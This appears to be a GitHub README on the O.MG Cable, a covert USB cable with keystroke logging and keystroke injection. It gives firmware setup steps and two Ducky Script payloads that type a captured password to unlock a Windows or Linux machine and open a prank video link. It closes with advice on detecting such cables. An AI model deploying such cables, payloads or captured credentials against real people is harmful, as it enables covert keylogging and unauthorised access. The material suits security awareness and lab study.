|
|
|
# O.MG Device
|
|
|
|
|
|
|
|
|
|
|
|
## Description
|
|
|
|
O.MG Cable is a USB cable with a built-in Wi-Fi microcontroller on the connector part. Accessing the O.MG cable is capable of delivering payloads and detecting keystrokes on standard operating systems, and mobile devices, allowing hackers to view usernames, passwords, and other inputs
|
|
|
|
via Wi-Fi and remote control the terminal into which the cable is inserted. Accessing the web server, and injecting a payload are transmitted to a USB connector. Like a Rubber Ducky, it can be used to deploy a reserves shells and retrieve data. Transmitting them the live keystroke over Wi-Fi. This can acts like a normal cable when it's not transmitting.
|
|
|
|
|
|
|
|
## Setup
|
|
|
|
### 3 Things you will need for setup:
|
|
|
|
1. Download the USB to UART Bridge VCP drives which can be found [here](https://www.silabs.com/developers/usb-to-uart-bridge-vcp-drivers)
|
|
|
|
1. Download the [O.MG](https://github.com/O-MG/O.MG_Cable-Firmware) repository or use the [Web UI](https://o-mg.github.io/WebFlasher/)
|
|
|
|
1. Run ```$ sudo python3 flash.py```
|
|
|
|
1. Set the cable to Access Point mode
|
|
|
|
1. Create SSID and Password
|
|
|
|
|
|
|
|
Once the wireless network configuration is finished, we're ready to find our target.
|
|
|
|
The access point will only appear when it connects to the device.
|
|
|
|
|
|
|
|
For AP mode, the default connection is: http://192.168.4.1
|
|
|
|
|
|
|
|
## Getting Started
|
|
|
|
Once the cable is connected to the target device on the connector end. It will set up an access point and we can connect to it via Wi-Fi.
|
|
|
|
It does use [Rubber Ducky syntax](https://docs.hak5.org/usb-rubber-ducky-1/the-ducky-script-language/ducky-script-quick-reference)
|
|
|
|
|
|
|
|
## Keylogger
|
|
|
|
The O.MG cable can transmit the keystrokes from AP via phone or computer and collect the information from the target.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## Payload
|
|
|
|
Using the password that I capture. Which was ```SuperGoodPassword``` to drop my payload.
|
|
|
|
|
|
|
|
- A simple script to run the browser on Windows
|
|
|
|
```
|
|
|
|
VID 05AC
|
|
|
|
PID 0263
|
|
|
|
UPARROW
|
|
|
|
DELAY 2000
|
|
|
|
ENTER
|
|
|
|
DELAY 2000
|
|
|
|
STRING SuperGoodPassword
|
|
|
|
UPARROW
|
|
|
|
DELAY 1000
|
|
|
|
GUI r
|
|
|
|
DELAY 1000
|
|
|
|
STRING https://youtu.be/dQw4w9WgXcQ
|
|
|
|
ENTER
|
|
|
|
DELAY 100
|
|
|
|
F11
|
|
|
|
DELAY 1000
|
|
|
|
F
|
|
|
|
```
|
|
|
|
- A simple script to run in Linux. Using the password that I capture.
|
|
|
|
|
|
|
|
```
|
|
|
|
VID 05AC
|
|
|
|
PID 0263
|
|
|
|
UPARROW
|
|
|
|
DELAY 2000
|
|
|
|
ENTER
|
|
|
|
DELAY 2000
|
|
|
|
STRING SuperGoodPassword
|
|
|
|
ENTER
|
|
|
|
DELAY 5000
|
|
|
|
ALT F2
|
|
|
|
DELAY 50
|
|
|
|
STRING firefox
|
|
|
|
DELAY 50
|
|
|
|
ENTER
|
|
|
|
DELAY 2000
|
|
|
|
STRING https://www.youtube.com/watch?v=dQw4w9WgXc
|
|
|
|
ENTER
|
|
|
|
ENTER
|
|
|
|
TAB
|
|
|
|
ENTER
|
|
|
|
DELAY 2000
|
|
|
|
F
|
|
|
|
```
|
|
|
|
|
|
|
|
## Detect a Fake Cable
|
|
|
|
[Hak5](https://shop.hak5.org/products/malicious-cable-detector-by-o-mg) has a cable detector to determine if the cable is malicious. Some people can check the weight of the cable to determine if it matches the specification. Use USB Tester to check if it's pushing out the correct voltage to a device.
|
|
|
|
|
|
|
|
## Security Awareness
|
|
|
|
There are multiple ways to detect a fake cable. Most people will buy the wrong type of cable from an off-brand, cheap, or even buy online. Amazon has a lot of seller's markets as the wrong item.
|
|
|
|
A random flash drive can be dangerous but, what about a regular phone charging cable?
|
|
|
|
|
|
|
|
## References
|
|
|
|
[Rubber Ducky SYNTAX](https://docs.hak5.org/usb-rubber-ducky-1/the-ducky-script-language/ducky-script-quick-reference)
|
|
|
|
|
|
|
|
[HomeBrew](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b)
|
|
|
|
|
|
|
|
[Hak5](https://github.com/hak5) |
|
|
|
\ No newline at end of file |
